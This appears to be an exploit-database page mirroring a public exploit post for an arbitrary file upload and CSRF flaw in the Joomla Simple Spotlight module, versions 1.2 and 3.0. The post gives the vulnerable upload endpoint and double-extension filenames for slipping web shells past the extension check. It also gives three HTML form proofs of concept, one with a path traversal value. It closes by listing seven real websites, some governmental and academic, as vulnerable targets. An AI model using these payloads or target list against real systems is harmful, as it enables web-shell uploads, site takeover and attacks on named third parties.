Advertisement






Joomla ModPPCSimpleSpotLight Modules 1.2/3.0 CSRF Backdoor Access Vulnerability

CVE Category Price Severity
CWE-264 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2019-03-04
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030020

Below is a copy:

Joomla ModPPCSimpleSpotLight Modules 1.2/3.0 CSRF Backdoor Access Vulnerability
###############################################################################

# Exploit Title : Joomla ModPPCSimpleSpotLight Modules 1.2/3.0 CSRF Backdoor Access Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/03/2019
# Vendor Homepage : pixelpointcreative.com
# Software Download Link : pixelpointcreative.com/joomla/downloads/category/40-simple-spotlight
# Software Information Link : extensions.joomla.org/extension/simple-spotlight/
bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,1547/Itemid,95/
# Software Version : 1.2 and 3.0
# Software Price Type : Free/Paid Download
# Solution : Upgrade and Update to 3.1 or higher version
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###############################################################################

# Description about Software :
***************************
Simple spotlight is a jQuery image rotator with navigation for Joomla.

###############################################################################

# Impact :
***********
Joomla ModPPCSimpleSpotLight 1.2/3.0 versions is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can 

result in arbitrary code execution within the context of the vulnerable application.

Weaknesses in this category are related to the management of permissions, privileges, 

and other security features that are used to perform access control.

###############################################################################

# Arbitrary File Upload / Unauthorized File Insertation / Shell Upload Backdoor Access Exploit :
**********************************************************************************
/modules/mod_ppc_simple_spotlight/elements/upload_file.php

# Directory File Path : 
*********************
/modules/mod_ppc_simple_spotlight/img/.......

# Note :  It is possible to upload shell files like this => 

Sh3LL.php.gif   -  Sh3LL.php;.gif   - Sh3LL.asp;.jpeg  

Sh3LL.php;.gif ;.jpeg  -  Sh3LL.php;.swf ;.flv  

.jpg .jpeg .gif .png

It says : File Uploaded Successfully!

###############################################################################

Cross Site Request Forgery Exploits :
**********************************

CSRF Exploiter PoC 1 => 
************************
<form action="example.com/[PATH]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

###############################################################################

CSRF Exploiter PoC 2 =>
************************* 
<form enctype="multipart/form-data"
action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">
Your File: <input name="upload_file" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

###############################################################################

CSRF Exploiter PoC 3 =>
************************* 
</script>
 <form name="newad" method="post" enctype="multipart/form-data"  action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">
 <table>
 <tr>
<td>
<input type="file" name="image">
</td>
</tr>
 <tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
 </table>
 </form>

###############################################################################

# Example Vulnerable Sites :
*************************
[+] velb.com.br/modules/mod_ppc_simple_spotlight/elements/upload_file.php

[+] chambre-hotes-lyon.fr/modules/mod_ppc_simple_spotlight/elements/upload_file.php

[+] doc.ncnu.edu.tw/rnd/modules/mod_ppc_simple_spotlight/elements/upload_file.php

[+] hjasin.moh.gov.my/modules/mod_ppc_simple_spotlight/elements/upload_file.php

[+] lce.ac.ls/modules/mod_ppc_simple_spotlight/elements/upload_file.php

[+] esg.edu.ar/modules/mod_ppc_simple_spotlight/elements/upload_file.php

[+] launion.go.cr/modules/mod_ppc_simple_spotlight/elements/upload_file.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.